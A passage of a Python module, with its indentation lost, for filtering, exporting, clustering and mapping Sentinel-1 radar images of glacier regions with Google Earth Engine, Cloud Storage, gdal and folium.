# if ci > cmax then it's a strong signal ->> retain
x = image.select(bandNames).updateMask(ci.gte(cmax)).rename(bandNames)
#Merge
output = ee.ImageCollection([zHat,rHat,x]).sum()
redone = image.addBands(output, None, True)
return redone
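# Hedged sketch: each speckle filter above (lowpass1/2, highpass1/2, frost,
# gammamap) takes and returns an ee.Image, so they can be applied directly or
# mapped over a list of images. The image id below is a placeholder assumption.
#
# img = ee.Image('COPERNICUS/S1_GRD_FLOAT/...')   # placeholder Sentinel-1 scene
# despeckled = gammamap(img)
# smoothed = [lowpass1(i) for i in (img, despeckled)]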
# download functions
def merger(directory='export'):
"""
Run this function after the download is complete to have gdal attempt \
to merge the geoTIFFs. Generally it should not be used on its own.
Parameters:
directory (str): The directory to find the unmerged TIF images in. Defaults to 'export'
Returns:
None.
"""
tiles = glob.glob((directory+'/*.tif'))
tiles = " ".join(tiles)
name = directory + "/" + tiles[tiles.find('/')+1:tiles.find('.tif')-2] + ".tif"
print(name)
os.system(f'gdal_merge.py -o {name} {tiles}')  # the '!'/'$var' forms only work in IPython, not os.system
if os.path.isfile(name):
for file in os.scandir(directory):
if file.path.endswith('.tif') and file.path.count('_')==9:
print(file.path, 'has been deleted!')
os.remove(file.path)
else:
assert True, "gdal_merge was not found, \
try restarting the kernel and running merger(directory)"
def batchExport(images, scale, coords, cloud_bucket='',
directory='', to_disk=True, tryReduce=False):
"""
Creates a number of ee.batch tasks equal to the number of ee.Image objects in images. \
The images are downloaded to the Google Cloud Platform Storage glaciers_ee \
bin in the subdirectory set, and also to the disk if to_disk is True.
Parameters:
images (list): a list of images to export to cloudstorage
scale (int): the scale in meters/pixel to download the images at
cloud_bucket (str): The cloud bucket to temporarily upload the images to
directory (str): the subdirectory to download the images to in the \
glaciers_ee bin. Defaults to 'export'
to_disk (bool): If set to True, the images will proceed to download to \
disk. Defaults to True
tryReduce (bool): If set to True, if the images fail for any reason, \
the reduction algorithm will attempt to split the image into smaller segments
Returns:
None.
"""
images_sort = images[:]
def start_tasks(images, scale, cloud_bucket, directory):
for img in images:
try:
system_index = img.get('system:index').getInfo()
system_index + ''
except:
system_index = img.get('system:id').getInfo()
task = ee.batch.Export.image.toCloudStorage(**{
'image': img,
'fileNamePrefix': directory + '/' + system_index,
'region': ee.Geometry.Polygon(coords),
'scale': scale,
'crs': 'EPSG:3031',
'bucket': cloud_bucket,
'fileFormat': 'GeoTIFF',
'maxPixels': 10e12
})
print(system_index, "is being uploaded.")
task.start()
tasks.append(task)
active_ind.append(task.active())
def time_for_completion(active_ind, scale, rate=1.5):
num_imgs = active_ind.count(True)
try:
time_left = (num_imgs * rect_area(coords)/scale * 1/rate)**(3/4) # hours
except:
time_left = (num_imgs * 1/scale * 1/rate)
if time_left < 1/60:
time_left *= 3600
units = 'seconds'
elif time_left < 1.0:
time_left *= 60
units = 'minutes'
else:
units = 'hours'
completion_string = 'The approximate completion time is: {:.1f} {}.'\
.format(time_left, units)
return completion_string
def reduced_upload(failed_task, scale, cloud_bucket, directory):
failed_i = tasks.index(failed_task)
failed_image = images_sort[failed_i]
image_coordinates = failed_image.get('system:footprint').getInfo()['coordinates']
image_segmented = reduce(image_coordinates)
n = 0
for coords in image_segmented.tolist():
name = failed_image.get('system:index').getInfo()
try:
name + ''
except:
name = failed_image.get('system:id').getInfo().replace("/", "")
name_n = name + '_' + str(n)
new_aoi = ee.Geometry.Polygon([coords])
task = ee.batch.Export.image.toCloudStorage(**{
'image': failed_image,
'region': new_aoi,
'fileNamePrefix': directory + '/' + name_n,
'scale': scale,
'crs': 'EPSG:3031',
'bucket': cloud_bucket,
'fileFormat': 'GeoTIFF',
'maxPixels': 10e12
})
task.start()
tasks.append(task)
active_ind.append(task.active())
images_sort.append(failed_image.clip(new_aoi))
n += 1
tasks.pop(failed_i)
active_ind.pop(failed_i)
images_sort.pop(failed_i)
def status_check(tasks):
tasks_copy = tasks[:]
for task in tasks_copy:
if task.status()['state'].lower() == "failed" and tryReduce:
print('Task #{} has failed.'.format(task.id),
'Trying geometrically reduced uploads.')
reduced_upload(task, scale, cloud_bucket, directory)
elif task.status()['state'].lower() == "failed":
active_ind[tasks.index(task)] = False
print('The upload has failed, most likely due to the GEE',
'10e12 pixel limitation. Try a smaller sized geoJSON or tryReduce.',
'The cloud_bucket set should also be checked to see it exists.')
elif task.status()['state'].lower() == "completed":
active_ind[tasks.index(task)] = False
else:
print('{} is {}'.format('Task #' + task.id,
task.status()['state'].lower()))
tasks = []
active_ind = []
STARTED_TASKS = False
start_time = dt.datetime.now(pytz.utc)
exception_flag = False
while True:
try:
if not STARTED_TASKS:
start_tasks(images, scale, cloud_bucket, directory)
STARTED_TASKS = True
print(time_for_completion(active_ind, scale))
print('----------------------------------------------------')
time.sleep(5*active_ind.count(True)**(1/2))
status_check(tasks)
if True not in active_ind:
break
except Exception as e:
exception_flag = True
for task in tasks:
task.cancel()
try:
error_message = ee.data.getTaskStatus(task.id)[0]['error_message']
print(f'Task ID had an error message:\n {error_message}')
except:
print(e)
break
def get_new(start_time):
bucket = client.get_bucket(cloud_bucket)
blobs = client.list_blobs(bucket)
new_blobs = []
for blob in blobs:
dateandtime = blob.updated
if dateandtime > start_time:
new_blobs.append(blob)
return new_blobs
def download_list_of_blobs(list_of_blobs):
def nextfile(blob_name):
def filenamer(i, blob_name):
name = blob_name[:-4] + '_' + str(i) + ".tif"
filename = os.path.join(os.getcwd(), name)
return filename
i = 0
while os.path.isfile(filenamer(i, blob_name)):
i += 1
return filenamer(i, blob_name)
for blob in list_of_blobs:
filename = nextfile(blob_name=blob.name)
try:
with open(filename, 'w'):
pass
blob.download_to_filename(filename)
print('Downloading image as {}'.format(os.path.abspath(filename)))
except FileNotFoundError:
print('ERROR: Directory does not exist on disk!',
'Please create it first.')
if to_disk and not exception_flag:
new = get_new(start_time)
download_list_of_blobs(new)
def cloudtoeecommand(cloud_bucket, directory, assetname, geeusername):
"""
Returns an ee.Image from a cloud storage asset. Requirement:
must have a username and main folder with Google code editor
Parameters:
cloud_bucket (str): string describing the name of the cloud bucket
directory (str): directory describing the directory where the file is stored
assetname (str): the filename of the asset (without .tif)
geeusername (str): your username to store the asset in the code editor
Returns:
eeimage (ee.Image): the ee.Image object of the google cloud asset
"""
if assetname.endswith('.tif'):
assetname = assetname[:-4]
asset_id = 'users/' + geeusername + '/' + assetname
dl_dir = 'gs://' + cloud_bucket + '/' + directory
dl_file = dl_dir + '/' + assetname + '.tif'
command = f'earthengine upload image --asset_id={asset_id} {dl_file}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
result = pop.stdout.read().decode()
taskid = result[result.index(':')+2:result.index('\r')]
while True:
try:
command = f'earthengine task info {taskid}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
status = pop.stdout.read().decode().split(' ')[3]
if 'COMPLETED' in status:
break
elif 'FAILED' in status:
return None
print(f'Task #{taskid} is {status.lower().strip()}')
time.sleep(8)
except:
command = f'earthengine task cancel {taskid}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
command = f'earthengine acl set public {asset_id}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
time.sleep(1)
if assetname.startswith('S1'):
def extract_date(assetname):
val = -1
for i in range(4):
val = assetname.find("_", val+1)
datestr = assetname[val+1:assetname.find("_", val+1)]
formatted_date = datestr[:4] + '-' + datestr[4:6] + '-' + datestr[6:11] \
+ ':' + datestr[11:13] + ':' + datestr[13:15]
return formatted_date
command = f'earthengine asset set --time_start {extract_date(assetname)} {asset_id}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
eeimage = ee.Image(asset_id)
print(f'Task #{taskid} is available at {asset_id}')
return eeimage
def multicloudtoee(cloud_bucket, directory, geeusername):
"""
Creates callable image assets from all the Tiffs in a Cloud Directory. \
Requirement: must have a username and main folder with Google code editor
Parameters:
cloud_bucket (str): string describing the name of the cloud bucket
directory (str): directory describing all the images you'd like to upload
geeusername (str): your username to store the asset in the code editor
Returns:
None
"""
bucket = client.get_bucket(cloud_bucket)
blobs = client.list_blobs(bucket)
threads = []
assets = []
for blob in blobs:
ind = str(blob).find('/')
find = ' ' + directory
if str(blob)[ind-1:ind-len(find)-1:-1] != find[::-1]:
# if directory doesn't match, continue to next iter
continue
if str(blob)[ind:str(blob).find(',', ind)].strip() == '/':
# if blob is the actual directory and not a file, continue
continue
blob_info = str(blob).split(' ')
assetname = blob_info[2][blob_info[2].find('/')+1:-1]
if assetname.endswith('.tif'):
assetname = assetname[:-4]
asset_id = 'users/' + geeusername + '/' + assetname
assets.append(asset_id)
def do_convert(assetname=assetname):
# bind assetname at definition time so later loop iterations don't overwrite it
cloudtoeecommand(cloud_bucket, directory, assetname, geeusername)
while True:
alive_count = 0
for thread in threads:
if thread.is_alive(): alive_count += 1
if alive_count < 10:
break
else:
time.sleep(10)
print('Max allowed threads reached. Waiting for threads to free.')
t = threading.Thread(target=do_convert)
t.daemon = True
threads.append(t)
t.start()
for i in range(len(threads)):
threads[i].join()
image_objs_list = [ee.Image(asset) for asset in assets]
return image_objs_list
# folium maps
def add_ee_layer(self, ee_image_object, vis_params, name):
"""
Adds an ee.Image layer to a folium map
Parameters:
ee_image_object (ee.Image): An image to place on folium map
vis_params (dict): Visual parameters to display the image. See GEE "Image Visualization"
name (str): Name of layer on folium map
Returns:
None.
"""
map_id_dict = ee.Image(ee_image_object).getMapId(vis_params)
folium.raster_layers.TileLayer(
tiles = map_id_dict['tile_fetcher'].url_format,
attr = 'Map Data © <a href="https://earthengine.google.com/">Google Earth Engine</a>',
name = name,
overlay = True,
control = True
).add_to(self)
folium.Map.add_ee_layer = add_ee_layer
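# Hedged usage sketch: after the monkey-patch above, any folium.Map instance
# can overlay an ee.Image. The asset id and visual parameters below are
# illustrative assumptions, not values used elsewhere in this module.
#
# fmap = folium.Map(location=[-75.0, 0.0], zoom_start=6)       # [lat, lon]
# img = ee.Image('COPERNICUS/S1_GRD_FLOAT/...')                # placeholder asset id
# fmap.add_ee_layer(img, {'min': 0, 'max': 1}, name='example layer')
# fmap.add_child(folium.LayerControl())
# display(fmap)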
def eeICtolist(imageCollection):
"""
Converts an ee.ImageCollection to a python list of ee.Image objects.
Parameters:
imageCollection (ee.ImageCollection): the collection to be converted to a list
Returns:
images (list): the list of images in the ee.ImageCollection
"""
size = imageCollection.size()
eeList = imageCollection.toList(size)
aslist = []
for i in range(size.getInfo()):
aslist.append(ee.Image(eeList.get(i)))
return aslist
def dispHist(hists):
"""
Plots 1 histogram for each histogram passed into it.
Parameters:
hists (list): Can either be a histogram from Area.hist() or \
a list of histograms [Area.hist(img1), Area.hist(img2)]
Returns:
None.
"""
assert isinstance(hists, list), "Type of hists should be a list from self.hist, or a list of lists"
a = np.array(hists)
if a.ndim == 3:
# case for hists is a list of histograms
for hist in hists:
a = np.array(hist)
x = a[:, 0]
y = a[:, 1]/np.sum(a[:, 1])
plt.grid()
plt.plot(x, y, '.')
plt.show()
else:
# case for hists is single histogram
x = a[:, 0]
y = a[:, 1]/np.sum(a[:, 1])
plt.grid()
plt.plot(x, y, '.')
plt.show()
def get_dates(images):
"""
Returns the date of each image in the image collection.
Parameters:
images (ee.Image or ee.ImageCollection): Image/images to get the date of
Returns:
dates (str or list): The dates that the images were taken on
"""
try:
if isinstance(images, ee.ImageCollection):
dates = ee.List(images
.aggregate_array('system:time_start')
.map(lambda time_start:
ee.Date(time_start).format('Y-MM-dd'))).getInfo()
elif isinstance(images, ee.Image):
dates = ee.Date(images.get('system:time_start').getInfo()).format("yyyy-MM-dd").getInfo()
else:
assert True, "Image is not of type ee.Image or ee.ImageCollection"
return dates
except:
print('ERROR: Something went wrong and the Image does \
not have the system:time_start property.')
print('If you need the date, you can manually retrieve \
it from the system:index property')
return None
class Area:
"""
This is the main class. Defined by the geoJSON provided by the user, \
it contains methods for displaying, operating on, and downloading
ee.Images and ee.ImageCollections.
Parameters"
"--------
geoJSON (dict): The geoJSON defining a singular geographical area. \
See https://geojson.io/.
Methods:
- get_coords()
- get_aoi()
- apply_filters()
- one_per()
- latest_img()
- append_elevation_info()
- normalize_band()
- cluster()
- mapfilter()
- disp()
- download()
- hist()
- get_stats()
- get_CM_stats()
- pypeline()
"""
def __init__(self, geoJSON):
self.geoJSON = geoJSON
self.coords = self.geoJSON['features'][0]['geometry']['coordinates']
self.aoi = ee.Geometry.Polygon(self.get_coords())
def get_coords(self):
"""
Gets the coordinates defined by the geoJSON.
Parameters"
"--------
None.
Returns:
self.coords (list): The coordinates defined by the geoJSON.
"""
return self.coords
def get_aoi(self):
"""
Gets the AOI defined by the coordinates.
Parameters"
"--------
None.
Returns:
self.aoi (list): The AOI defined by the coordinates.
"""
return self.aoi
def apply_filters(self, collection='COPERNICUS/S1_GRD_FLOAT',
start_date=ee.Date(0),
end_date=ee.Date(date.today().isoformat()),
polarization=None, res=None, orbit_node=None,
ins=None, earliest_first=False):
"""
Applies filters to grab an image collecton.
Parameters:
collection (str): Which collection to grab images from
start_date (ee.Date): Start date of filtering
end_date (ee.Date): End date of filtering
polarization (str): Type of polarization to exclusively filter for. \
Defaults to None (any). List of polarization for Sentinel-1 Radar:
- SH: Single HH
- DH: Dual HH/HV
- SV: Single VV
- DV: Dual VV/VH
res (str): L, M, or H. Resolution to filter for. Defaults to None (any)
orbit_node (str): 'ASCENDING' or 'DESCENDING'. Orbit pass. Defaults to None (any)
ins (str): The instrumental mode to filter for. Defaults to None (any)
earliest_first (bool): If set to True, the ee.ImageCollection returned \
will be sorted s.t. the first ee.Image will be the captured the \
earliest. Defaults to False for latest image first.
Returns:
sort (ee.ImageCollection): An image collection with the area of geoJSON
and the specified filters in the args applied.
"""
if isinstance(start_date, (str, int)):
start_date = ee.Date(start_date)
if isinstance(end_date, (str, int)):
end_date = ee.Date(end_date)
aoi = self.get_aoi()
img_set = ee.ImageCollection(collection).filterBounds(aoi).filterDate(start_date, end_date)
if polarization is not None:
polarization_dict = {
'SH': [ee.Filter.listContains('transmitterReceiverPolarisation', 'HH'),
ee.Filter.listContains('transmitterReceiverPolarisation', 'HV').Not()],
'DH': [ee.Filter.listContains('transmitterReceiverPolarisation', 'HH'),
ee.Filter.listContains('transmitterReceiverPolarisation', 'HV')],
'SV': [ee.Filter.listContains('transmitterReceiverPolarisation', 'VV'),
ee.Filter.listContains('transmitterReceiverPolarisation', 'VH').Not()],
'DV': [ee.Filter.listContains('transmitterReceiverPolarisation', 'VV'),
ee.Filter.listContains('transmitterReceiverPolarisation', 'VH'),]}
for filt in polarization_dict[polarization]:
img_set = img_set.filter(filt)
if ins is not None:
img_set = img_set.filter(ee.Filter.eq('instrumentMode', ins))
if res is not None:
img_set = img_set.filter(ee.Filter.eq('resolution', res))
if orbit_node is not None:
img_set = img_set.filter(ee.Filter.eq('orbitProperties_pass', orbit_node))
sort = img_set.sort('system:time_start', opt_ascending=earliest_first)
print(f'This image collection has {sort.size().getInfo()} images.')
return ee.ImageCollection(sort)
def one_per(self, time_range, collection='COPERNICUS/S1_GRD_FLOAT',
start_date=ee.Date(0),
end_date=ee.Date(date.today().isoformat()),
polarization=None, res=None, orbit_node=None, ins=None):
"""
Applies filters to create a LIST with one ee.Image per time_range.
Parameters:
time_range (str): day, month, or year. Specifies the approximate \
time range between photos.
collection (str): Which collection to grab images from
start_date (ee.Date): Start date of filtering
end_date (ee.Date): End date of filtering
polarization (str): Type of polarization to exclusively filter for. \
Defaults to None (any). List of polarization for Sentinel-1 Radar:
- SH: Single HH
- DH: Dual HH/HV
- SV: Single VV
- DV: Dual VV/VH
res (str): L, M, or H. Resolution to filter for. Defaults to None \
for any resolution
orbit_node (str): 'ASCENDING' or 'DESCENDING'. Orbit pass. Defaults to None (any)
ins (str): The instrumental mode to filter for (IW/EW). Defaults to None \
for any instrument mode
Returns:
collected_imgs (ee.ImageCollection): An image collection with the area
of geoJSON and the proper filters applied
"""
def percent_missing(image):
"""
Helper function that returns the % of the image data missing in the first band.
Parameters:
image (ee.Image): The image to calculate the % missing of
Returns:
percentMissing (float): The % missing of the image data compared \
to the self.get_aoi()
"""
missing = ee.Number(image.mask().expression('1-b(0)').reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
totalArea = ee.Number(ee.Image(1).mask().reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
percent_missing = missing.divide(totalArea).getInfo()
return percent_missing
if isinstance(start_date, (str, int)):
start_date = ee.Date(start_date)
if isinstance(end_date, (str, int)):
end_date = ee.Date(end_date)
end_date_time = end_date
current_start_time = start_date
collected_imgs = []
while ee.Algorithms.If(
ee.Number.expression("x > 0", {
'x': end_date_time.difference(current_start_time, 'day')
}), 1, 0).getInfo():
(current_start_time, current_end_time) = (ee.Date(current_start_time)
.getRange(time_range).getInfo()['dates'])
img_col = self.apply_filters(collection=collection,
start_date=current_start_time,
end_date=current_end_time, polarization=polarization,
orbit_node=orbit_node, res=res, ins=ins, earliest_first=True)
try:
as_list = img_col.toList(img_col.size())
best = ee.Image(as_list.get(0)).clip(self.get_aoi())
pm_best = percent_missing(best)
for i in range(as_list.length().getInfo()):
latest = ee.Image(as_list.get(i)).clip(self.get_aoi())
pm_latest = percent_missing(latest)
if pm_latest < 0.01:
best = latest
pm_best = pm_latest
break
elif pm_latest < pm_best:
best = latest
pm_best = pm_latest
collected_imgs.append(best.clip(self.get_aoi()))
print('Selected an image for {}'
.format(ee.Date(current_start_time).format('YYYY-MM-dd').getInfo()))
except:
print('There are no images in the',
time_range, "starting on",
ee.Date(current_start_time).format('YYYY-MM-dd').getInfo())
current_start_time = current_end_time
return ee.ImageCollection(collected_imgs)
def latest_img(self, collection='COPERNICUS/S1_GRD_FLOAT', threshold=80):
"""
Grabs the latest image in the given collection.
Parameters:
collection (str): A collection name from GEE's public collections data. \
Defaults to S1_GRD_FLOAT
Returns:
latest (ee.Image): The latest image for this area
"""
def validity(image, threshold):
def percent_missing(image):
"""
Helper function that returns the % of the image data missing in the first band.
Parameters:
image (ee.Image): The image to calculate the % missing of
Returns:
percentMissing (float): The % missing of the image data compared \
to the self.get_aoi()
"""
missing = ee.Number(image.mask().expression('1-b(0)').reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
totalArea = ee.Number(ee.Image(1).mask().reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
pm = missing.divide(totalArea).getInfo()
return pm
return percent_missing(image)*100 < (100 - threshold)
img_col = self.apply_filters(collection=collection)
eelist = img_col.toList(img_col.size())
for i in range(min(50, img_col.size().getInfo())):
latest = ee.Image(eelist.get(i)).clip(self.get_aoi())
if validity(latest, threshold=threshold):
return latest
print('No images within threshold')
return None
def append_elevation_info(self, image):
"""
Adds the elevation information to each image passed into it. \
The image argument must be an ee.Image. Warning: this method \
takes from the mosaic data, so it does not vary with time.
Parameters:
images (ee.Image): Image to add the elevation information. Since \
this is a class function, these are covering the same geographical
area.
Returns:
multi (ee.Image): Image with added elevation as a new band
"""
assert isinstance(image, ee.Image), "Image must be a singular ee.Image object"
elv_collection = 'UMN/PGC/REMA/V1_1/8m'
aoi = self.get_aoi()
elevation = ee.Image(elv_collection).clip(aoi)
multi = ee.Image([image, elevation])
return multi
def normalize_band(self, image, band=0, band_range=None):
"""
Normalizes the band of a given image/images.
Parameters:
image (ee.Image, ee.ImageCollection, list): An image or images \
to normalize
band (int, str): The band of the image to normalize. Either the \
named band or an int representing which band to normalize
band_range (list): If set, will normalize to between these two \
values and clamp all outside to the minimum and maximum.
Returns:
normalized (ee.Image, list): An image or images with the normalize \
band as the new first band. The other bands are untouched
"""
if isinstance(image, ee.Image):
bands = image.bandNames().getInfo()
elif isinstance(image, ee.ImageCollection):
image = eeICtolist(image)
bands = image[0].bandNames().getInfo()
elif isinstance(image, list):
bands = image[0].bandNames().getInfo()
else:
raise TypeError('image arg must be ee.Image, ee.ImageCollection, list')
if isinstance(band, int):
selected_band = bands[band]
elif isinstance(band, str):
selected_band = band
else:
raise TypeError('band arg must be int, str')
aoi = self.get_aoi()
def normalize(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__')
image_band = image.select(selected_band)
rest = image.select([bnd for bnd in bands if bnd != selected_band])
if band_range:
if len(band_range) != 2:
raise ValueError('band_range should be a list of two values')
mini = band_range[0]
maxi = band_range[1]
image_band = image_band.clamp(mini, maxi)
else:
scale = image_band.projection().nominalScale().getInfo()
if scale > 100:
scale = 10
min_max_dict = image_band.reduceRegion(
ee.Reducer.minMax(),
aoi,
crs='EPSG:3031',
scale=scale,
maxPixels=10e12
)
mini = ee.Number(min_max_dict.get('{}_min'.format(selected_band)))
maxi = ee.Number(min_max_dict.get('{}_max'.format(selected_band)))
normalized = image_band.unitScale(mini, maxi)
merged = ee.Image([normalized, rest])
return merged.set('system:index', system_index)
if isinstance(image, ee.Image):
return normalize(image)
return list(map(normalize, image))
def cluster(self, image, compactness=0, mapfilter=True):
"""
(Warning): MUST be done AFTER normalization
(Warning: removes the angle band)
Data is scaled to 0-255.
Clusters an image or images using the Google Earth Engine SNIC \
(Simple Non-Iterative Clustering) algorithm
Parameters:
images (ee.Image, ee.ImageCollection, list): Image/images to create clusters on
compactness (int): Number representing the approximate size of clusters
mapfilter (bool): If enabled, will filter the images before clustering
Returns:
clustered (same as images): The image/images with these bands:
- clusters (unique ID/cluster)
- radar_data_mean (per cluster, of the original image's first non-angle band)
- original first non-angle band
"""
assert isinstance(image, (
ee.Image, ee.ImageCollection, list)
), "Image must be either ee.Image, ee.ImageCollection, or list of ee.Images"
print('Starting clustering...')
if mapfilter:
image = self.mapfilter(image)
def map_cluster(image):
image = ee.Image(image)
coordinates = image.get('system:footprint').getInfo()['coordinates']
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__')
SNIC = ee.Algorithms.Image.Segmentation.SNIC(
image, **{'compactness': compactness,
'connectivity': 8,
'size': 20})
SNIC_bands_removed = SNIC.select([band for band in SNIC.bandNames().getInfo()
if band != 'angle_mean' and band != 'angle'
and band != 'labels' and band != 'seeds'])
SNIC_bands_removed = ee.Image([SNIC_bands_removed, image])
if not SNIC_bands_removed.get('Int32').getInfo():
SNIC_bands_removed = SNIC_bands_removed.multiply(255).toInt32().set('Int32', True)
return SNIC_bands_removed.set('system:index', system_index).set('system:footprint', coordinates)
def remove_angle(image):
bands_angle_removed = image.bandNames().filter(
ee.Filter.neq('item', 'angle'))
return image.select(bands_angle_removed)
if isinstance(image, ee.Image):
image = remove_angle(image)
clustered = map_cluster(image)
elif isinstance(image, ee.ImageCollection):
image = eeICtolist(image)
clustered = list(map(map_cluster, image))
elif isinstance(image, list):
clustered = list(map(map_cluster, image))
print('Clustering done')
return clustered
def mapfilter(self, image, use_filter='gammamap'):
"""
Applies a filter to the image argument. List of implemented filters:
- lowpass1
- lowpass2
- highpass1
- highpass2
- frost (as in https://www.imageeprocessing.com/2018/06/frost-filter.html)
- gammamap (as in Lopes A., Nezry, E., Touzi, R., and Laur, H., 1990.)
Parameters:
image (ee.Image, ee.ImageCollection, list): The image/images to be \
filtered for speckle
use_filter (str): The filter to use for filtering
Returns:
filtered (same as image): The filtered image/images
"""
assert isinstance(image, (
ee.Image, ee.ImageCollection, list)
), "Image must be either ee.Image, ee.ImageCollection, or list of ee.Images"
use_filter = globals().get(use_filter)
def filt(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__') + f'_{use_filter.__name__}'
return use_filter(image).set('system:index', system_index)
if isinstance(image, ee.Image):
filtered = filt(image)
elif isinstance(image, ee.ImageCollection):
image = eeICtolist(image)
filtered = list(map(filt, image))
elif isinstance(image, list):
filtered = list(map(filt, image))
return filtered
def disp(self, image, rgb=False, band=0):
"""
Displays an image in rgb/grayscale folium map fashion
Parameters:
image (ee.Image): The image to display
rgb (bool): Whether or not to display in rgb corresponding to
band (int): Selects which band to display if rgb is set to False. \
Defaults to 0.
Returns:
None.
"""
assert isinstance(image, ee.Image), "Image must be a singular ee.Image object"
location = self.get_aoi().centroid().coordinates().getInfo()[::-1]
# folium doesn't support crs other than crs 4326
fmap = folium.Map(location=location, zoom_start=12)
bands = image.bandNames().getInfo()
if rgb:
try:
blue = image.select('elevation')
blue.bandNames().getInfo()
except:
blue = image.select(bands[0]).divide(image.select(bands[1]))
rgb = ee.Image.rgb(image.select(bands[0]),
image.select(bands[1]), blue)
fmap.add_ee_layer(rgb, {'min': [0, 0, 0], 'max': [1, 1, 200]}, name='Image')
fmap.add_child(folium.LayerControl())
display(fmap)
else:
fmap.add_ee_layer(image.select(bands[band]), {'min': 0, 'max': 1}, name='Image')
fmap.add_child(folium.LayerControl())
display(fmap)
def download(self, image, scale, cloud_bucket, directory, to_disk=True, tryReduce=False,
withbandsfile=False):
"""
Downloads either an image or an image collection to a directory.
(note: I couldn't get geemap to download singular images, but
I also couldn't get Google EE to download multiple images. In the end,
I decided to download singular images to the local directory, but
python lists of images or ee.ImageCollection will be saved to
the glaciers_ee bucket in Google Cloud Platform)
Parameters:
images (list): a list of images to export to cloudstorage
scale (int): the scale in meters/pixel to download the images at
cloud_bucket (str): The cloud bucket to temporarily upload the images to
directory (str): the subdirectory to download the images to in the \
glaciers_ee bin. Defaults to 'export'
to_disk (bool): If set to True, the images will proceed to download to \
disk. Defaults to True
tryReduce (bool): If set to True, if the images fail for any reason, \
the reduction algorithm will attempt to split the image into smaller segments
Returns:
None.
"""
assert isinstance(image, (
ee.Image, ee.ImageCollection, list)
), "Image must be either ee.Image, ee.ImageCollection, or list of ee.Images"
if isinstance(image, ee.Image):
print('When the images are finished uploading, they will be available at:')
print(f'https://console.cloud.google.com/storage/browser/{cloud_bucket}')
batchExport([image], scale=scale, cloud_bucket=cloud_bucket,
directory=directory, tryReduce=tryReduce,
coords=self.get_coords())
elif isinstance(image, list):
print('When the images are finished uploading, they will be available at:')
print(f'https://console.cloud.google.com/storage/browser/{cloud_bucket}')
batchExport(image, scale=scale, cloud_bucket=cloud_bucket,
directory=directory, tryReduce=tryReduce,
coords=self.get_coords())
elif isinstance(image, ee.ImageCollection):
print('When the images are finished uploading, they will be available at:')
print(f'https://console.cloud.google.com/storage/browser/{cloud_bucket}')
aslist = eeICtolist(image)
batchExport(aslist, scale=scale, cloud_bucket=cloud_bucket,
directory=directory, tryReduce=tryReduce,
coords=self.get_coords())
def hist(self, image, band=0):
"""
Creates the values for an intensity histogram of an image.
Parameters:
image (ee.Image): The image to calculate the histogram for
band (int): The band to calculate the pixel intensities for
Returns:
hist (list): The histogram created
"""
assert isinstance(image, ee.Image), "Image must be a singular ee.Image object"
aoi = self.get_aoi()
bands = image.bandNames()
band_max = image.select(band).reduceRegion(ee.Reducer.max(),
aoi, crs='EPSG:3031', scale=100)
maxi = ee.Number(band_max.get(bands.get(band))).getInfo()
if maxi >= 2:
print("Warning: the image may not haven been properly normalized.",
"The image should be renormalized before creating a histogram")
hist = image.select(band).reduceRegion(ee.Reducer.fixedHistogram(0, 1, 500),
aoi).get(bands.get(band)).getInfo()
return hist
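# Example (sketch, not part of the class): plotting the returned histogram.
# Assumes fixedHistogram's output format of [bucket_start, count] pairs and that
# matplotlib is installed; 'area' and 'img' are placeholders for your own objects.
#   import numpy as np
#   import matplotlib.pyplot as plt
#   counts = np.array(area.hist(img, band=0))
#   plt.bar(counts[:, 0], counts[:, 1], width=1/500)
#   plt.xlabel('pixel intensity'); plt.ylabel('count'); plt.show()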
def get_stats(self, image, band=0):
"""
Grabs common statistics about an image's specified band, including \
mean, variance, and skew.
Parameters:
image (ee.Image): The image to grab stats about
band (int or str): The band of the image to calculate statistics for
Returns:
stats (dict): A dictionary containing statistics about the image band.
"""
assert isinstance(image, ee.Image), "Image must be a singular ee.Image object"
bands = image.bandNames().getInfo()
if isinstance(band, int):
stats = {}
stats['mean'] = image.select(bands[band]).reduceRegion(ee.Reducer.mean(),
self.get_aoi()).get(bands[band]).getInfo()
stats['variance'] = image.select(bands[band]).reduceRegion(ee.Reducer.variance(),
self.get_aoi()).get(bands[band]).getInfo()
stats['skew'] = image.select(bands[band]).reduceRegion(ee.Reducer.skew(),
self.get_aoi()).get(bands[band]).getInfo()
elif isinstance(band, str):
stats = {}
stats['mean'] = image.select(band).reduceRegion(ee.Reducer.mean(),
self.get_aoi()).get(band).getInfo()
stats['variance'] = image.select(band).reduceRegion(ee.Reducer.variance(),
self.get_aoi()).get(band).getInfo()
stats['skew'] = image.select(band).reduceRegion(ee.Reducer.skew(),
self.get_aoi()).get(band).getInfo()
return stats
def get_CM_stats(self, image, band=0, info_to_store=['contrast', 'corr', 'diss', 'ent', 'asm', 'idm', 'prom']):
"""
Grabs averaged statistics derivable from the co-occurrence matrix of
an image band. Data is scaled to 0-255. List of statistics returned:
- contrast (contrast)
- correlation (corr)
- dissimilarity (diss)
- entropy (ent)
- uniformity, i.e. angular second moment (asm)
- inverse difference moment (idm)
- cluster prominence (prom)
Parameters:
image (ee.Image, ee.ImageCollection, or list): image/images to use
band (int or str): band to calculate CM stats on
info_to_store (list): default list of texture data to return; can be
modified to limit the returned data
Returns:
CM_stats (same type as image): image/images with bands as listed above
"""
print('Starting CM_stats ...')
def CM(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
